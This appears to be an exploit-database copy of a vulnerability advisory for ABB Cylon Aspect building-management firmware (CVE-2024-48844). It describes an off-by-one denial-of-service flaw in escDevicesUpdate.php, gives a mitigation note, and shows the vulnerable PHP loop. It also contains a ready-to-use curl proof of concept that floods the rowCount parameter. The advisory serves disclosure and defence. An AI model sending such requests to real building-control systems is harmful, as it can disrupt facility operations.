ABB Cylon Aspect 3.08.02 Off-by-One Config Write Denial of Service

vendor:

ABB Cylon Aspect

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Off-by-One Error

787

CWE

Product Name: ABB Cylon Aspect

Affected Version From: <=3.08.02

Affected Version To: 37471

Patch Exists: NO

Related CWE: CVE-2024-48844

CPE: a:abb_ltd:aspect:3.08.02

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux, Intel processors, PHP, AspectFT Automation Application Server, lighttpd, Apache, OpenJDK, ErgoTech MIX Deployment Server

2024

ABB Cylon Aspect 3.08.02 Off-by-One Config Write Denial of Service

A vulnerability was found in ABB Cylon Aspect 3.08.02 in the escDevicesUpdate.php PHP script, where an off-by-one error in array access could result in undefined behavior and a possible Denial of Service (DoS) attack. The issue occurs in a loop that iterates over an array using a < condition, enabling access to an out-of-bounds index. This could lead to errors or unexpected behavior, potentially causing the application to crash. Exploiting this vulnerability could result in a crash or service disruption, especially with large data sets. The vulnerability can be triggered via the rowCount POST parameter in the Electronic Security Control device update script.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the vendor-supplied patches or updates to the affected ABB Cylon Aspect firmware version 3.08.02 or lower. Additionally, input validation and boundary checks should be implemented in the PHP script to prevent off-by-one errors.

Source

Exploit-DB raw data:

ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: A vulnerability was identified in a PHP script where an off-by-one
error in array access could lead to undefined behavior and potential DoS.
The issue arises in a loop that iterates over an array using a < condition,
allowing access to an out-of-bounds index. This can trigger errors or unexpected
behavior when processing data, potentially crashing the application. Successful
exploitation of this vulnerability can lead to a crash or disruption of service,
especially if the script handles large data sets. This issue can be triggered
via the rowCount POST parameter in the Electronic Security Control device update
script.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.


$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);

unset($ini['comm']['esc-ip-addr']);

$rowCount = $_POST['rowCount'];

for ($i = 1; $i < $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}

if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...